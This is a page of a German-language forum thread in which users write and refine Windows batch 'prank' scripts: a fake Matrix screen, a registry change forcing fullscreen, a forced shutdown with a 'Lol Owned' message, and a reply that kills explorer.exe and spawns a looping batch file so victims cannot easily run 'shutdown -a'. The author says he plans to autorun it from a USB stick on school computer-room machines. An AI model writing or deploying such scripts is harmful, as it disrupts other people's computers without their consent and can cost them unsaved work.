Seite 2 von 2 ErsteErste 12
Ergebnis 11 bis 19 von 19
  1. #11
    Bugbear Wurm
    Registriert seit
    28.08.2008
    Beiträge
    255

    Standard

    ich kapier dein vorhaben nbicht zu 100%.
    beschreib doch mal schritt für schritt was du getan hast und achte dabei bitte darauf, dass man auch versteht was du meinst (bissl rechtschreibung machts leicher xD).

    jetzt verlier ich nämlich den überblick, dachte du willst einen matrix code starten lassen, und ihn per tastetndruck beenden lassen, aber anscheinend willst du was andres. also bitte, erklär mal, in einem text, schritt für schritt dein vorhaben und kopier am besten den code mal rein, den gesamten der damit zusammenhängt, nicht nur eine zeile.

    Lg

  2. #12
    Trojaner
    Registriert seit
    03.10.2008
    Beiträge
    63

    Standard

    Ok hier mein code:
    Code:
    echo @echo off > matrix.bat
    echo color a >> matrix.bat
    echo :10 >> matrix.bat
    echo echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% >> matrix.bat
    echo goto 10 >> matrix.bat
    start matrix.bat
    reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "1" /f > nul 
    msg * Tipp:BlaBla
    ::hier  will ich einbauen das er wenn ich eine taste drücke "reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "0" /f > nul " ausführt
    ::soweit habe ich das entwickelt
    shutdown -s -f -t 300 -c "Lol Owned BlaBla"
    Meine Frage steht im code aber ich stelle sie nochmal:
    Wie lasse ich das script so lange warten bis zum ausführen bis ich eine taste drücke
    und funktioniert das script auf XP (ich habe nur Vista und da geht dieser reg key nicht)

  3. #13
    ~Polska~ Avatar von Zylasty
    Registriert seit
    21.03.2008
    Beiträge
    442

    Standard

    xP man kann aber ja dann auch einfach "Ausführen" öffnen und "shutdown -a" ohne Anführungszeichen eingeben ^^
    dann wird das Herunterfahren auch beendet (also der Pc läuft normal weiter!)

  4. #14
    W32.FunLove
    Registriert seit
    03.08.2008
    Beiträge
    161

    Standard

    gegen das "shutdown -a" sollte folgendes helfen:
    ---------------
    shutdown -s -f -t 30 -c "Lol Owned Blablabla"
    taskkill /IM explorer.exe
    echo :1 > 1.bat
    echo start 1.bat > 1.bat
    echo goto 1 > 1.bat
    start 1.bat
    ---------------

    sollte eigentlich lange genug beschäftigen!
    hab übrigens 300 sekunden mit 30 ersetzt
    zugegeben: wenn jemand auch nur ein wenig mehr ahnung hat ist auch das kein problem...
    aber soll ja kein sysfucker werden
    Zitat Zitat von andre2612
    ich kann nicht ganz folgen was ist sufu????????? klingt blöd aber ich bin neu
    also entschuldigt meine unwissentheit

  5. #15
    Trojaner
    Registriert seit
    03.10.2008
    Beiträge
    63

    Standard

    Nein ich möchte ein script haben das wenn ich eine bestimmte taste drückt
    Code:
    reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "0" /f > nul
    ausführt

  6. #16
    Trojaner
    Registriert seit
    25.11.2008
    Beiträge
    53

    Standard

    habs mir ma kopiert, in editor geschmissen und .bat abgespeichert, und angeschaut^^

    sieht ja bis jez cool aus, nur ein bisschen müllig und durcheinander finde ich..






  7. #17
    Trojaner
    Registriert seit
    03.10.2008
    Beiträge
    63

    Standard

    Danke man muss auch nicht zu hohe erwartungen an das teil haben,
    will nur im computerraum die leute ein bisschen ärgern(ich mache es auf meinen
    usb stick und schreib ne autostart datei.
    ich würde mich freunen wenn mir jemand sagen könnte wie man bei batch auf tastendruck
    Code:
    reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "0" /f > nul
    ausführen lassen kann

  8. #18
    Bugbear Wurm
    Registriert seit
    28.08.2008
    Beiträge
    255

    Standard

    http://www.source-center.de/forum/sh...ad.php?t=47200

    das könnte dir weiterhelfen...
    ansonsten vl sowas (da musst du allerdings nicht nur eine taste drücken sondern beispielsweise den befehl "fullscreen" eingeben)

    Code:
    @echo off
    title eingabe
    color a
    
    :A
    set input=
    set /p input=input:
    if %input%==fullscreen goto b
    goto A
    
    :b
    reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "0" /f > nul 
    goto A

  9. #19
    Trojaner
    Registriert seit
    03.10.2008
    Beiträge
    63

    Standard

    K danke das hat mir geholfen. habe aber noch eine frage,
    wie geht ein command, das ich eine andere batchdatei schließe

    Added after 52 minutes:

    Ja es klappt.
    matrix.bat:
    Code:
    ::made by Systemless
    @echo off
    echo noinput > 1.txt
    color 2
    start stopit.bat
    :start
    echo %random% %random%  %random% %random%   %random% %random%   %random% %random%   %random% %random%
    set /p hlp= < 1.txt
    if "%hlp:~0,7%"=="noinput" goto start
    echo noinput > 1.txt
    Und die Stupit.bat(die shutdowns sind zum testen als comments gesetzt):
    Code:
    ::Made by Systemless
    @echo off
    mode 40,7
    title Eingabefenster
    
    :anfang
    cls
    echo ****************************************
    echo **************Eingabe Hier**************
    echo ******Schreibe Tipp für einen Tipp******
    echo ****************************************
    set /p a=
    if /I %a%==stopit goto shutdown
    if /I %a%==plzstopit goto win
    if /I %a%==Tipp goto shutdowntipp
    ping 127.0.0.1 -n 1 > nul
    goto falsch
    
    :falsch
    ::shutdown.exe -r -f -t 300 || shutdown.exe /r /f /t 300
    goto anfangohne
    
    :shutdowntipp
    ::shutdown.exe -r -f -t 300 || shutdown.exe /r /f /t 300
    goto tipp
    
    :shutdown
    ::shutdown.exe -r -f -t 300 || shutdown.exe /r /f /t 300
    goto countdown
    
    :tipp
    cls
    msg * Hör auf auf Englisch, aber höflich! || echo Hör auf auf Englisch, aber höflich!
    timeout 5
    goto anfangohne
    
    :anfangohne
    cls
    echo ****************************************
    echo **************Eingabe Hier**************
    echo ******Schreibe Tipp für einen Tipp******
    echo ****************************************
    set /p a=
    if /I %a%==stopit goto countdown
    if /I %a%==plzstopit goto win
    if /I %a%==tipp goto tipp
    ping 127.0.0.1 -n 1 > nul
    goto anfangohne
    
    :countdown
    cls
    ::shutdown.exe -r -f -t 300 || shutdown.exe /r /f /t 300
    cls
    echo This wasn't polite.
    ping 127.0.0.1 -n 3 >nul && cls
    echo Please Wait..
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait...
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait....
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait.....
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait......
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait.......
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait........
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait.........
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait..........
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait...........
    ping 127.0.0.1 -n 2 >nul && cls
    echo Please Wait............
    ping 127.0.0.1 -n 2 >nul && cls
    :wahl
    cls
    set /P w= Nochmal Probieren?[y]/[n]
    if /I "%w%"=="y" goto anfangohne 
    if /I "%w%"=="n" goto owned
    echo Wrong Input: [%w%]
    pause
    goto wahl
    
    :win
    cls
    reg add "HKCU\Console" /v FullScreen /t REG_DWORD /d "0" /f > nul
    echo ende > 1.txt
    shutdown.exe -a || shutdown.exe /a
    pause
    exit
    
    :owned
    cls
    set /P h= Bist du dir sicher?[y]/[n]
    if /I "%h%"=="y" goto anfangohne
    if /I "%h%"=="n" goto youarestupid
    goto owned
    
    :youarestupid
    cls
    set /P d= Es wird schrekliche konsequenzen haben [y]/[n]
    if /I "%d%"=="y" goto anfangohne
    if /I "%d%"=="n" goto stupid
    goto youarestupid
    
    :stupid
    ::shutdown.exe -s -f -t 10 || shutdown.exe /s /f /t 10
    msg * "Owned"
    exit
    Added after 1 hours 14 minutes:

    kann man unterbinden das man in stop.bat commandos wie "exit" schreiben kann?

Seite 2 von 2 ErsteErste 12

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •